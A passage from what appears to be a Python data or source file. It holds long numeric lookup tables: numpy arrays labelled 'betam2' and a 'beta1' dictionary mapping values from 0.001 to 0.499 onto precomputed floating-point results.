1785,0.179,0.17933333333333332,0.17966666666666667,0.18,0.1805,0.181,0.1815,0.182,0.1825,0.183,0.18333333333333332,0.18366666666666667,0.184,0.1845,0.185,0.1855,0.186,0.1865,0.187,0.1875,0.188,0.1885,0.189,0.18933333333333333,0.18966666666666668,0.19,0.1905,0.191,0.1915,0.192,0.1925,0.193,0.1935,0.194,0.1945,0.195,0.1955,0.196,0.1965,0.197,0.1975,0.198,0.19833333333333333,0.19866666666666669,0.199,0.1995,0.2,0.2005,0.201,0.2015,0.202,0.2025,0.203,0.20350000000000001,0.204,0.2045,0.205,0.2055,0.206,0.2065,0.207,0.2075,0.208,0.2085,0.209,0.2095,0.21,0.2105,0.211,0.212,0.2125,0.213,0.2135,0.214,0.2145,0.215,0.2155,0.216,0.2165,0.217,0.2175,0.218,0.2185,0.219,0.2195,0.22,0.221,0.2215,0.222,0.2225,0.223,0.2235,0.224,0.2245,0.225,0.2255,0.226,0.227,0.2275,0.228,0.2285,0.229,0.2295,0.23,0.231,0.2315,0.232,0.2325,0.233,0.2335,0.234,0.235,0.2355,0.236,0.2365,0.237,0.238,0.2385,0.239,0.2395,0.24,0.241,0.2415,0.242,0.2425,0.243,0.244,0.2445,0.245,0.2455,0.246,0.247,0.2475,0.248,0.249
,0.2495,0.25,0.2505,0.251,0.252,0.2525,0.253,0.254,0.2545,0.255,0.256,0.2565,0.257,0.258,0.2585,0.259,0.26,0.2605,0.261,0.262,0.2625,0.263,0.264,0.2645,0.265,0.266,0.2665,0.267,0.268,0.2685,0.269,0.27,0.271,0.2715,0.272,0.273,0.2735,0.274,0.275,0.276,0.2765,0.277,0.278,0.279,0.2795,0.28,0.281,0.282,0.2825,0.283,0.284,0.285,0.2855,0.286,0.287,0.288,0.2885,0.289,0.29,0.291,0.292,0.2925,0.293,0.294,0.295,0.296,0.2965,0.297,0.298,0.299,0.3,0.301,0.3015,0.302,0.303,0.304,0.305,0.306,0.307,0.3075,0.308,0.309,0.31,0.311,0.312,0.313,0.314,0.3145,0.315,0.316,0.317,0.318,0.319,0.32,0.321,0.322,0.323,0.324,0.325,0.326,0.327,0.328,0.329,0.33,0.331,0.332,0.333,0.334,0.335,0.336,0.337,0.338,0.339,0.34,0.341,0.342,0.343,0.344,0.345,0.346,0.347,0.349,0.35,0.351,0.352,0.353,0.354,0.355,0.357,0.358,0.359,0.36,0.361,0.363,0.364,0.365,0.366,0.367,0.369,0.37,0.371,0.373,0.374,0.375,0.376,0.378,0.379,0.381,0.382,0.383,0.385,0.386,0.387,0.389,0.39,0.392,0.393,0.395,0.396,0.398,0.399,0.401,0.402,0.404,0.406,0.407,0.409,0.411,0.412,0.414,0.416,0.417,0.419,0.421,0.423,0.424,0.426,0.428,0.43,0.432,0.434,0.436,0.438,0.44,0.442,0.444,0.446,0.448,0.45,0.453,0.455,0.457,0.46,0.462,0.464,0.467,0.469,0.472,0.474,0.477,0.48,0.483,0.485,0.488,0.491,0.494,0.497,0.501,0.504,0.507,0.511,0.514,0.518,0.522,0.525,0.529,0.534,0.538,0.542,0.547,0.552,0.557,0.562,0.568,0.574,0.58,0.587,0.594,0.602,0.61,0.619,0.629,0.64,0.653,0.668,0.687,0.711,0.749,0.999]), 'betam2': 
np.array([0.251,0.288,0.313,0.331,0.346,0.359,0.371,0.381,0.39,0.398,0.406,0.413,0.419,0.426,0.432,0.437,0.442,0.448,0.452,0.457,0.462,0.466,0.47,0.474,0.478,0.482,0.485,0.489,0.492,0.496,0.499,0.502,0.505,0.508,0.511,0.514,0.517,0.52,0.522,0.525,0.528,0.53,0.533,0.535,0.538,0.54,0.542,0.545,0.547,0.549,0.551,0.553,0.555,0.558,0.56,0.562,0.564,0.566,0.567,0.569,0.571,0.573,0.575,0.577,0.579,0.58,0.582,0.584,0.586,0.587,0.589,0.591,0.592,0.594,0.595,0.597,0.599,0.6,0.602,0.603,0.605,0.606,0.608,0.609,0.61,0.612,0.613,0.615,0.616,0.617,0.619,0.62,0.622,0.623,0.624,0.626,0.627,0.628,0.629,0.631,0.632,0.633,0.634,0.636,0.637,0.638,0.639,0.64,0.642,0.643,0.644,0.645,0.646,0.647,0.649,0.65,0.651,0.652,0.653,0.654,0.655,0.656,0.657,0.658,0.659,0.66,0.662,0.663,0.664,0.665,0.666,0.667,0.668,0.669,0.67,0.671,0.672,0.673,0.674,0.675,0.676,0.6765000000000001,0.677,0.678,0.679,0.68,0.681,0.682,0.683,0.684,0.685,0.686,0.687,0.688,0.6884999999999999,0.689,0.69,0.691,0.692,0.693,0.694,0.695,0.6955,0.696,0.697,0.698,0.699,0.7,0.7004999999999999,0.701,0.702,0.703,0.704,0.705,0.7055,0.706,0.707,0.708,0.709,0.7095,0.71,0.711,0.712,0.7124999999999999,0.713,0.714,0.715,0.716,0.7164999999999999,0.717,0.718,0.719,0.7195,0.72,0.721,0.7215,0.722,0.723,0.724,0.7244999999999999,0.725,0.726,0.727,0.7275,0.728,0.729,0.7295,0.73,0.731,0.732,0.7324999999999999,0.733,0.734,0.7344999999999999,0.735,0.736,0.7364999999999999,0.737,0.738,0.7384999999999999,0.739,0.74,0.7404999999999999,0.741,0.742,0.7424999999999999,0.743,0.744,0.7444999999999999,0.745,0.746,0.7464999999999999,0.747,0.748,0.7484999999999999,0.749,0.7495,0.75,0.751,0.7515000000000001,0.752,0.753,0.7535000000000001,0.754,0.7545,0.755,0.756,0.7565,0.757,0.7575000000000001,0.758,0.759,0.7595000000000001,0.76,0.7605,0.761,0.762,0.7625,0.763,0.7635000000000001,0.764,0.765,0.7655000000000001,0.766,0.7665,0.767,0.768,0.7685,0.769,0.7695000000000001,0.77,0.7705,0.771,0.7715000000000001,0.772,0.773,0.7735000000000001,0.774,0.7745,0.775,0.775500
0000000001,0.776,0.7765,0.777,0.778,0.7785,0.779,0.7795000000000001,0.78,0.7805,0.781,0.7815000000000001,0.782,0.7825,0.783,0.784,0.7845,0.785,0.7855000000000001,0.786,0.7865,0.787,0.7875000000000001,0.788,0.7885,0.789,0.7895000000000001,0.79,0.7905,0.791,0.7915000000000001,0.792,0.7925,0.793,0.7935000000000001,0.794,0.7945,0.795,0.7955000000000001,0.796,0.7965,0.797,0.7975000000000001,0.798,0.7985,0.799,0.7995000000000001,0.8,0.8005,0.801,0.8015000000000001,0.802,0.8025,0.803,0.8035000000000001,0.804,0.8045,0.805,0.8055000000000001,0.806,0.8063333333333333,0.8066666666666668,0.807,0.8075000000000001,0.808,0.8085,0.809,0.8095000000000001,0.81,0.8105,0.811,0.8115000000000001,0.812,0.8125,0.813,0.8133333333333332,0.8136666666666666,0.814,0.8145,0.815,0.8154999999999999,0.816,0.8165,0.817,0.8173333333333332,0.8176666666666667,0.818,0.8185,0.819,0.8194999999999999,0.82,0.8205,0.821,0.8213333333333332,0.8216666666666667,0.822,0.8225,0.823,0.8234999999999999,0.824,0.8245,0.825,0.8253333333333333,0.8256666666666667,0.826,0.8265,0.827,0.8274999999999999,0.828,0.8283333333333333,0.8286666666666667,0.829,0.8294999999999999,0.83,0.8303333333333333,0.8306666666666667,0.831,0.8314999999999999,0.832,0.8325,0.833,0.8333333333333333,0.8336666666666667,0.834,0.8345,0.835,0.8353333333333333,0.8356666666666667,0.836,0.8365,0.837,0.8373333333333333,0.8376666666666667,0.838,0.8385,0.839,0.8393333333333333,0.8396666666666667,0.84,0.8405,0.841,0.8413333333333333,0.8416666666666667,0.842,0.8425,0.843,0.8433333333333333,0.8436666666666667,0.844,0.8445,0.845,0.8453333333333333,0.8456666666666667,0.846,0.8465,0.847,0.8473333333333333,0.8476666666666667,0.848,0.8485,0.849,0.8493333333333333,0.8496666666666667,0.85,0.8503333333333333,0.8506666666666667,0.851,0.8514999999999999,0.852,0.8523333333333333,0.8526666666666667,0.853,0.8533333333333333,0.8536666666666667,0.854,0.8545,0.855,0.8553333333333333,0.8556666666666667,0.856,0.8563333333333333,0.8566666666666667,0.857,0.8574999999999999,0.858,0
.8583333333333333,0.8586666666666667,0.859,0.8593333333333333,0.8596666666666667,0.86,0.8605,0.861,0.8613333333333333,0.8616666666666667,0.862,0.8623333333333333,0.8626666666666667,0.863,0.8633333333333333,0.8636666666666667,0.864,0.8643333333333333,0.8646666666666667,0.865,0.8654999999999999,0.866,0.8663333333333333,0.8666666666666667,0.867,0.8673333333333333,0.8676666666666667,0.868,0.8683333333333333,0.8686666666666667,0.869,0.8693333333333333,0.8696666666666667,0.87,0.8703333333333333,0.8706666666666667,0.871,0.8714999999999999,0.872,0.8723333333333333,0.8726666666666667,0.873,0.8733333333333333,0.8736666666666667,0.874,0.8743333333333333,0.8746666666666667,0.875,0.8753333333333333,0.8756666666666667,0.876,0.8763333333333333,0.8766666666666667,0.877,0.8773333333333333,0.8776666666666667,0.878,0.8783333333333333,0.8786666666666667,0.879,0.8793333333333333,0.8796666666666667,0.88,0.8803333333333333,0.8806666666666667,0.881,0.8813333333333333,0.8816666666666667,0.882,0.8823333333333333,0.8826666666666667,0.883,0.8833333333333333,0.8836666666666667,0.884,0.8843333333333333,0.8846666666666667,0.885,0.8853333333333333,0.8856666666666667,0.886,0.8863333333333333,0.8866666666666667,0.887,0.8873333333333333,0.8876666666666667,0.888,0.88825,0.8885000000000001,0.88875,0.889,0.8893333333333333,0.8896666666666667,0.89,0.8903333333333333,0.8906666666666667,0.891,0.8913333333333333,0.8916666666666667,0.892,0.8923333333333333,0.8926666666666667,0.893,0.8933333333333333,0.8936666666666667,0.894,0.89425,0.8945000000000001,0.89475,0.895,0.8953333333333333,0.8956666666666667,0.896,0.8963333333333333,0.8966666666666667,0.897,0.8973333333333333,0.8976666666666667,0.898,0.89825,0.8985000000000001,0.89875,0.899,0.8993333333333333,0.8996666666666667,0.9,0.9003333333333333,0.9006666666666667,0.901,0.9013333333333333,0.9016666666666667,0.902,0.90225,0.9025000000000001,0.90275,0.903,0.9033333333333333,0.9036666666666667,0.904,0.9043333333333333,0.9046666666666667,0.905,0.90525,0.9055,0.905
75,0.906,0.9063333333333333,0.9066666666666667,0.907,0.90725,0.9075,0.9077500000000001,0.908,0.9083333333333333,0.9086666666666667,0.909,0.9093333333333333,0.9096666666666667,0.91,0.91025,0.9105000000000001,0.9107500000000001,0.911,0.9113333333333333,0.9116666666666667,0.912,0.91225,0.9125000000000001,0.9127500000000001,0.913,0.9133333333333333,0.9136666666666667,0.914,0.91425,0.9145000000000001,0.9147500000000001,0.915,0.9153333333333333,0.9156666666666667,0.916,0.91625,0.9165000000000001,0.9167500000000001,0.917,0.9173333333333333,0.9176666666666667,0.918,0.91825,0.9185000000000001,0.9187500000000001,0.919,0.9193333333333333,0.9196666666666667,0.92,0.92025,0.9205000000000001,0.9207500000000001,0.921,0.92125,0.9215,0.9217500000000001,0.922,0.9223333333333333,0.9226666666666667,0.923,0.92325,0.9235,0.9237500000000001,0.924,0.92425,0.9245000000000001,0.9247500000000001,0.925,0.9253333333333333,0.9256666666666667,0.926,0.92625,0.9265000000000001,0.9267500000000001,0.927,0.92725,0.9275,0.9277500000000001,0.928,0.9283333333333333,0.9286666666666668,0.929,0.92925,0.9295,0.9297500000000001,0.93,0.93025,0.9305000000000001,0.9307500000000001,0.931,0.93125,0.9315,0.9317500000000001,0.932,0.9323333333333333,0.9326666666666668,0.933,0.93325,0.9335,0.9337500000000001,0.934,0.93425,0.9345000000000001,0.9347500000000001,0.935,0.93525,0.9355,0.9357500000000001,0.936,0.93625,0.9365000000000001,0.9367500000000001,0.937,0.93725,0.9375,0.93775,0.938,0.9383333333333332,0.9386666666666666,0.939,0.9392499999999999,0.9395,0.93975,0.94,0.9402499999999999,0.9404999999999999,0.94075,0.941,0.9412499999999999,0.9415,0.94175,0.942,0.9422499999999999,0.9424999999999999,0.94275,0.943,0.9432499999999999,0.9435,0.94375,0.944,0.9442499999999999,0.9444999999999999,0.94475,0.945,0.9452499999999999,0.9455,0.94575,0.946,0.9462499999999999,0.9464999999999999,0.94675,0.947,0.9472499999999999,0.9475,0.94775,0.948,0.9482499999999999,0.9484999999999999,0.94875,0.949,0.9492499999999999,0.9495,0.94975,0.95,0.9
502499999999999,0.9504999999999999,0.95075,0.951,0.9512499999999999,0.9515,0.95175,0.952,0.9522499999999999,0.9524999999999999,0.95275,0.953,0.9531999999999999,0.9533999999999999,0.9536,0.9538,0.954,0.9542499999999999,0.9544999999999999,0.95475,0.955,0.9552499999999999,0.9555,0.95575,0.956,0.9562499999999999,0.9564999999999999,0.95675,0.957,0.9572499999999999,0.9575,0.95775,0.958,0.9581999999999999,0.9583999999999999,0.9586,0.9588,0.959,0.9592499999999999,0.9595,0.95975,0.96,0.9602499999999999,0.9604999999999999,0.96075,0.961,0.9612499999999999,0.9615,0.96175,0.962,0.9621999999999999,0.9623999999999999,0.9626,0.9628,0.963,0.9632499999999999,0.9635,0.96375,0.964,0.9642499999999999,0.9644999999999999,0.96475,0.965,0.9652,0.9653999999999999,0.9656,0.9658,0.966,0.9662499999999999,0.9664999999999999,0.96675,0.967,0.9672499999999999,0.9675,0.96775,0.968,0.9682,0.9683999999999999,0.9686,0.9688,0.969,0.96925,0.9695,0.96975,0.97,0.9702,0.9703999999999999,0.9706,0.9708,0.971,0.97125,0.9715,0.97175,0.972,0.9722,0.9723999999999999,0.9726,0.9728,0.973,0.97325,0.9735,0.97375,0.974,0.9742,0.9743999999999999,0.9746,0.9748,0.975,0.97525,0.9755,0.97575,0.976,0.9762,0.9763999999999999,0.9766,0.9768,0.977,0.97725,0.9775,0.97775,0.978,0.9782,0.9783999999999999,0.9786,0.9788,0.979,0.97925,0.9795,0.97975,0.98,0.9802,0.9803999999999999,0.9806,0.9808,0.981,0.9812,0.9813999999999999,0.9816,0.9818,0.982,0.98225,0.9824999999999999,0.98275,0.983,0.9832,0.9833999999999999,0.9836,0.9838,0.984,0.9842,0.9843999999999999,0.9846,0.9848,0.985,0.98525,0.9855,0.98575,0.986,0.9862,0.9863999999999999,0.9866,0.9868,0.987,0.9872,0.9873999999999999,0.9876,0.9878,0.988,0.9882,0.9884,0.9886,0.9888,0.989,0.98925,0.9895,0.98975,0.99,0.9902,0.9904,0.9906,0.9908,0.991,0.9912,0.9914,0.9916,0.9918,0.992,0.9922,0.9924,0.9926,0.9928,0.993,0.9932,0.9934,0.9936,0.9938,0.994,0.9942,0.9944,0.9946,0.9948,0.995,0.9952,0.9954,0.9956,0.9958,0.996,0.9962,0.9964,0.9966,0.9968,0.997,0.9972,0.9974,0.9976,0.9978,0.998,0.9982,0.998
4,0.9986,0.9988,0.999,0.999,0.999,0.999,0.999]), 'beta1': {0.001: 0.00000319442756483, 0.002: 0.000011317463697, 0.003: 0.00002437224702, 0.004: 0.0000423586850569, 0.005: 0.0000652765986715, 0.006: 0.000093125769818, 0.007: 0.00012590591620148937, 0.008: 0.000163616721998012, 0.009: 0.0002062578100772347, 0.01: 0.0002538287583069279, 0.011: 0.000306329099853549, 0.012: 0.0003637583165964183, 0.013: 0.00042611584087932117, 0.014: 0.0004934010586615567, 0.015: 0.0005656133072855606, 0.016: 0.0006427518732867943, 0.017: 0.0007248159948162249, 0.018: 0.0008118048635664835, 0.019: 0.000903717621891434, 0.02: 0.001000553362565144, 0.021: 0.0011023111298422304, 0.022: 0.0012089899209829437, 0.023: 0.0013205886834092976, 0.024: 0.0014371063162054868, 0.025: 0.0015585416705288157, 0.026: 0.0016848935476064277, 0.027: 0.0018161607022541798, 0.028: 0.0019523418388866748, 0.029: 0.0020934356144756165, 0.03: 0.0022394406373552373, 0.031: 0.0023903554673226357, 0.032: 0.002546178615709405, 0.033: 0.0027069085455906938, 0.034: 0.002872543671793369, 0.035: 0.003043082360056609, 0.036: 0.0032185229285702534, 0.037: 0.0033988636467273906, 0.038: 0.003584102735485491, 0.039: 0.0037742383681569234, 0.04: 0.0039692686688357764, 0.041: 0.004169191713873449, 0.042: 0.004374005531412682, 0.043: 0.004583708101164634, 0.044: 0.004798297354602275, 0.045: 0.0050177711752145615, 0.046: 0.005242127397945962, 0.047: 0.005471363809906498, 0.048: 0.005705478149896408, 0.049: 0.005944468108748165, 0.05: 0.006188331329046212, 0.051: 0.006437065405400269, 0.052: 0.006690667884335984, 0.053: 0.006949136264386165, 0.054: 0.007212467996054513, 0.055: 0.0074806604819125325, 0.056: 0.007753711076500667, 0.057: 0.008031617086616195, 0.058: 0.008314375770990291, 0.059: 0.008601984340523077, 0.06: 0.00889443995837608, 0.061: 0.009191739739750827, 0.062: 0.009493880752152703, 0.063: 0.009800860015391079, 0.064: 0.010112674501407464, 0.065: 0.010429321134569111, 0.066: 0.010750796791506579, 0.067: 
0.011077098301304688, 0.068: 0.011408222445400728, 0.069: 0.011744165957592563, 0.07: 0.012084925524209297, 0.071: 0.012430497784060565, 0.072: 0.012780879328580696, 0.073: 0.01313606670159937, 0.074: 0.01349605639963192, 0.075: 0.013860844871816616, 0.076: 0.014230428519951752, 0.077: 0.014604803698527647, 0.078: 0.014983966714864808, 0.079: 0.015367913828869609, 0.08: 0.015756641253450998, 0.081: 0.016150145154226952, 0.082: 0.0165484216497625, 0.083: 0.01695146681157209, 0.084: 0.01735927666406806, 0.085: 0.017771847184727605, 0.086: 0.018189174304006774, 0.087: 0.0186112539055101, 0.088: 0.019038081825895253, 0.089: 0.0194696538550656, 0.09: 0.01990596573604259, 0.091: 0.02034701316514059, 0.092: 0.020792791791978432, 0.093: 0.0212432972194774, 0.094: 0.021698525003969734, 0.095: 0.022158470655141968, 0.096: 0.02262312963619951, 0.097: 0.023092497363824387, 0.098: 0.02356656920832857, 0.099: 0.024045340493509006, 0.1: 0.024528806496860827, 0.101: 0.02501696244963071, 0.102: 0.025509803536677367, 0.103: 0.02600732489678805, 0.104: 0.02650952162246471, 0.105: 0.027016388760153814, 0.106: 0.02752792131023947, 0.107: 0.028044114227047643, 0.108: 0.028564962418981356, 0.109: 0.02909046074847784, 0.11: 0.02962060403212325, 0.111: 0.030155387040732673, 0.112: 0.030694804499282566, 0.113: 0.031238851087102927, 0.114: 0.03178752143778703, 0.115: 0.03234081013938614, 0.116: 0.03289871173438084, 0.117: 0.03346122071974054, 0.118: 0.034028331546989775, 0.119: 0.034600038622262325, 0.12: 0.03517633630635684, 0.121: 0.03575721891478989, 0.122: 0.03634268071786485, 0.123: 0.03693271594069995, 0.124: 0.037527318763313854, 0.125: 0.038126483320662014, 0.126: 0.03873020370270661, 0.127: 0.03933847395449336, 0.128: 0.039951288076140665, 0.129: 0.04056864002300359, 0.13: 0.041190523705625356, 0.131: 0.041816932989891205, 0.132: 0.04244786169702028, 0.133: 0.04308330360365301, 0.134: 0.04372325244195518, 0.135: 0.0443677018995566, 0.136: 0.04501664561978973, 0.137: 
0.04567007720156599, 0.138: 0.04632799019958714, 0.139: 0.046990378124343715, 0.14: 0.04765723444216695, 0.141: 0.0483285525753247, 0.142: 0.049004325902069476, 0.143: 0.049684547756723464, 0.144: 0.05036921142970255, 0.145: 0.051058310167641355, 0.146: 0.05175183717341257, 0.147: 0.052449785606189916, 0.148: 0.05315214858157764, 0.149: 0.05385891917159001, 0.15: 0.054570090404798384, 0.151: 0.05528565526636637, 0.152: 0.05600560669808361, 0.153: 0.056729937598526965, 0.154: 0.05745864082302535, 0.155: 0.05819170918379992, 0.156: 0.05892913545003413, 0.157: 0.05967091234788417, 0.158: 0.060417032560635756, 0.159: 0.06116748872869495, 0.16: 0.06192227344973335, 0.161: 0.06268137927869694, 0.162: 0.06344479872792343, 0.163: 0.06421252426721585, 0.164: 0.06498454832387214, 0.165: 0.06576086328280793, 0.166: 0.06654146148661619, 0.167: 0.06732633523563517, 0.168: 0.06811547678803058, 0.169: 0.0689088783598769, 0.17: 0.06970653212522365, 0.171: 0.07050843021617553, 0.172: 0.07131456472297787, 0.173: 0.07212492769408313, 0.174: 0.07293951113623787, 0.175: 0.07375830701456244, 0.176: 0.07458130725262246, 0.177: 0.07540850373251008, 0.178: 0.0762398882949351, 0.179: 0.07707545273928854, 0.18: 0.07791518882372675, 0.181: 0.07875908826527792, 0.182: 0.07960714273989093, 0.183: 0.08045934388252407, 0.184: 0.08131568328724223, 0.185: 0.08217615250729793, 0.186: 0.0830407430551911, 0.187: 0.08390944640278333, 0.188: 0.0847822539813623, 0.189: 0.08565915718173367, 0.19: 0.08654014735430549, 0.191: 0.08742521580917012, 0.192: 0.08831435381620054, 0.193: 0.08920755260511812, 0.194: 0.09010480336558876, 0.195: 0.0910060972473264, 0.196: 0.09191142536015391, 0.197: 0.09282077877409256, 0.198: 0.09373414851947465, 0.199: 0.09465152558700353, 0.2: 0.09557290092786028, 0.201: 0.09649826545380326, 0.202: 0.09742761003720588, 0.203: 0.09836092551122107, 0.204: 0.09929820266980503, 0.205: 0.10023943226786301, 0.206: 0.10118460502128393, 0.207: 0.10213371160709263, 0.208: 
0.10308674266349475, 0.209: 0.10404368878997927, 0.21: 0.10500454054743683, 0.211: 0.10596928845821446, 0.212: 0.10693792300624841, 0.213: 0.10791043463711919, 0.214: 0.10888681375817334, 0.215: 0.10986705073861491, 0.216: 0.11085113590957893, 0.217: 0.11183905956425746, 0.218: 0.11283081195797032, 0.219: 0.11382638330828407, 0.22: 0.11482576379508422, 0.221: 0.11582894356068629, 0.222: 0.11683591270992946, 0.223: 0.11784666131028751, 0.224: 0.1188611793919315, 0.225: 0.11987945694787307, 0.226: 0.12090148393402742, 0.227: 0.12192725026933787, 0.228: 0.12295674583585153, 0.229: 0.12398996047883411, 0.23: 0.125026884006872, 0.231: 0.12606750619196658, 0.232: 0.12711181676963323, 0.233: 0.12815980543900615, 0.234: 0.12921146186294907, 0.235: 0.1302667756681294, 0.236: 0.13132573644515383, 0.237: 0.13238833374864933, 0.238: 0.13345455709737608, 0.239: 0.13452439597432544, 0.24: 0.1355978398268364, 0.241: 0.13667487806666417, 0.242: 0.13775550007013634, 0.243: 0.1388396951782204, 0.244: 0.13992745269663925, 0.245: 0.1410187618959683, 0.246: 0.14211361201176276, 0.247: 0.14321199224465206, 0.248: 0.14431389176043544, 0.249: 0.14541929969020284, 0.25: 0.1465282051304419, 0.251: 0.14764059714313438, 0.252: 0.14875646475587598, 0.253: 0.14987579696197337, 0.254: 0.15099858272057623, 0.255: 0.15212481095674632, 0.256: 0.15325447056160868, 0.257: 0.1543875503924239, 0.258: 0.1555240392727349, 0.259: 0.1566639259924429, 0.26: 0.15780719930794154, 0.261: 0.15895384794222778, 0.262: 0.1601038605849814, 0.263: 0.1612572258927219, 0.264: 0.162413932488892, 0.265: 0.16357396896397502, 0.266: 0.16473732387561, 0.267: 0.16590398574870388, 0.268: 0.16707394307554502, 0.269: 0.168247184315915, 0.27: 0.16942369789720155, 0.271: 0.17060347221452565, 0.272: 0.17178649563082535, 0.273: 0.1729727564770086, 0.274: 0.17416224305204242, 0.275: 0.17535494362307535, 0.276: 0.1765508464255532, 0.277: 0.1777499396633379, 0.278: 0.17895221150881968, 0.279: 0.18015765010303586, 0.28: 
0.1813662435557958, 0.281: 0.18257797994577735, 0.282: 0.18379284732066176, 0.283: 0.1850108336972498, 0.284: 0.18623192706156758, 0.285: 0.18745611536901166, 0.286: 0.18868338654443928, 0.287: 0.18991372848229773, 0.288: 0.19114712904674702, 0.289: 0.19238357607177733, 0.29: 0.1936230573613347, 0.291: 0.1948655606894299, 0.292: 0.19611107380026316, 0.293: 0.19735958440834733, 0.294: 0.198611080198637, 0.295: 0.19986554882663596, 0.296: 0.20112297791851938, 0.297: 0.20238335507126698, 0.298: 0.2036466678527809, 0.299: 0.2049129038020017, 0.3: 0.20618205042904286, 0.301: 0.20745409521529598, 0.302: 0.2087290256135832, 0.303: 0.2100068290482507, 0.304: 0.21128749291530408, 0.305: 0.21257100458254238, 0.306: 0.2138573513896706, 0.307: 0.21514652064842565, 0.308: 0.21643849964271128, 0.309: 0.21773327562871456, 0.31: 0.21903083583502458, 0.311: 0.220331167462782, 0.312: 0.22163425768578188, 0.313: 0.22294009365060716, 0.314: 0.22424866247676634, 0.315: 0.22555995125679856, 0.316: 0.22687394705642888, 0.317: 0.22819063691467345, 0.318: 0.22951000784397224, 0.319: 0.2308320468303265, 0.32: 0.2321567408334091, 0.321: 0.23348407678671212, 0.322: 0.23481404159767033, 0.323: 0.23614662214778254, 0.324: 0.237481805292754, 0.325: 0.23881957786260755, 0.326: 0.24015992666183777, 0.327: 0.24150283846951434, 0.328: 0.24284830003942898, 0.329: 0.24419629810023297, 0.33: 0.245546819355548, 0.331: 0.2468998504841105, 0.332: 0.24825537813989712, 0.333: 0.24961338895226673, 0.334: 0.2509738695260785, 0.335: 0.25233680644183276, 0.336: 0.25370218625580476, 0.337: 0.25506999550016285, 0.338: 0.256440220683123, 0.339: 0.2578128482890625, 0.34: 0.2591878647786696, 0.341: 0.2605652565890646, 0.342: 0.26194501013393234, 0.343: 0.263327111803676, 0.344: 0.2647115479655286, 0.345: 0.26609830496368747, 0.346: 0.2674873691194764, 0.347: 0.2688787267314526, 0.348: 0.27027236407555005, 0.349: 0.27166826740522, 0.35: 0.27306642295155764, 0.351: 0.27446681692344055, 0.352: 0.27586943550767346, 
0.353: 0.27727426486911566, 0.354: 0.2786812911508169, 0.355: 0.2800905004741664, 0.356: 0.28150187893901313, 0.357: 0.28291541262381076, 0.358: 0.2843310875857532, 0.359: 0.2857488898609069, 0.36: 0.2871688054643741, 0.361: 0.2885908203903904, 0.362: 0.2900149206125028, 0.363: 0.2914410920836759, 0.364: 0.2928693207364452, 0.365: 0.29429959248306115, 0.366: 0.29573189321561644, 0.367: 0.29716620880619204, 0.368: 0.2986025251069932, 0.369: 0.3000408279504931, 0.37: 0.301481103149569, 0.371: 0.3029233364976476, 0.372: 0.30436751376882576, 0.373: 0.3058136207180387, 0.374: 0.30726164308119197, 0.375: 0.30871156657528576, 0.376: 0.31016337689857654, 0.377: 0.31161705973070963, 0.378: 0.31307260073285487, 0.379: 0.3145299855478523, 0.38: 0.3159891998003598, 0.381: 0.3174502290969953, 0.382: 0.3189130590264567, 0.383: 0.3203776751596956, 0.384: 0.321844063050042, 0.385: 0.32331220823334217, 0.386: 0.3247820962281231, 0.387: 0.32625371253570534, 0.388: 0.3277270426403723, 0.389: 0.32920207200950036, 0.39: 0.3306787860936957, 0.391: 0.33215717032696657, 0.392: 0.333637210126832, 0.393: 0.3351188908944808, 0.394: 0.3366021980149178, 0.395: 0.3380871168571106, 0.396: 0.3395736327741287, 0.397: 0.34106173110327953, 0.398: 0.3425513971662752, 0.399: 0.3440426162693472, 0.4: 0.3455353737034259, 0.401: 0.3470296547442512, 0.402: 0.3485254446525525, 0.403: 0.3500227286741624, 0.404: 0.35152149204017535, 0.405: 0.35302171996710374, 0.406: 0.354523397657002, 0.407: 0.3560265102976395, 0.408: 0.35753104306261807, 0.409: 0.3590369811115355, 0.41: 0.3605443095901345, 0.411: 0.36205301363042935, 0.412: 0.363563078350876, 0.413: 0.3650744888565142, 0.414: 0.36658723023910045, 0.415: 0.36810128757726324, 0.416: 0.3696166459366538, 0.417: 0.37113329037008264, 0.418: 0.3726512059176903, 0.419: 0.37417037760706584, 0.42: 0.3756907904534177, 0.421: 0.3772124294597049, 0.422: 0.3787352796167929, 0.423: 0.38025932590360995, 0.424: 0.38178455328725935, 0.425: 0.38331094672322763, 0.426: 
0.38483849115546587, 0.427: 0.3863671715166128, 0.428: 0.3878969727280741, 0.429: 0.38942787970020715, 0.43: 0.3909598773324491, 0.431: 0.39249295051349326, 0.432: 0.3940270841214294, 0.433: 0.3955622630238702, 0.434: 0.3970984720781446, 0.435: 0.39863569613138533, 0.436: 0.4001739200207477, 0.437: 0.4017131285734936, 0.438: 0.4032533066071969, 0.439: 0.40479443892984845, 0.44: 0.4063365103400534, 0.441: 0.40787950562712527, 0.442: 0.40942340957127205, 0.443: 0.4109682069437599, 0.444: 0.4125138825070144, 0.445: 0.4140604210148085, 0.446: 0.41560780721240526, 0.447: 0.4171560258367122, 0.448: 0.41870506161641524, 0.449: 0.42025489927213305, 0.45: 0.4218055235166062, 0.451: 0.4233569190547962, 0.452: 0.4249090705840457, 0.453: 0.42646196279425613, 0.454: 0.42801558036802023, 0.455: 0.4295699079807639, 0.456: 0.43112493030093746, 0.457: 0.43268063199011475, 0.458: 0.4342369977031689, 0.459: 0.4357940120884325, 0.46: 0.43735165978783974, 0.461: 0.43890992543707424, 0.462: 0.44046879366572034, 0.463: 0.4420282490974222, 0.464: 0.4435882763500427, 0.465: 0.4451488600357907, 0.466: 0.4467099847613878, 0.467: 0.44827163512821255, 0.468: 0.4498337957324814, 0.469: 0.4513964511653555, 0.47: 0.4529595860131227, 0.471: 0.45452318485734966, 0.472: 0.4560872322750172, 0.473: 0.45765171283868333, 0.474: 0.45921661111663087, 0.475: 0.4607819116730264, 0.476: 0.4623475990680795, 0.477: 0.4639136578581664, 0.478: 0.46548007259599816, 0.479: 0.4670468278307892, 0.48: 0.4686139081083855, 0.481: 0.47018129797143204, 0.482: 0.4717489819595075, 0.483: 0.47331694460931284, 0.484: 0.4748851704547982, 0.485: 0.47645364402728674, 0.486: 0.47802234985568237, 0.487: 0.4795912724665903, 0.488: 0.4811603963844984, 0.489: 0.48272970613188726, 0.49: 0.48429918622939716, 0.491: 0.48586882119599994, 0.492: 0.4874385955491512, 0.493: 0.4890084938049162, 0.494: 0.4905785004781269, 0.495: 0.49214860008258726, 0.496: 0.4937187771311442, 0.497: 0.4952890161358954, 0.498: 0.4968593016083247, 0.499: 
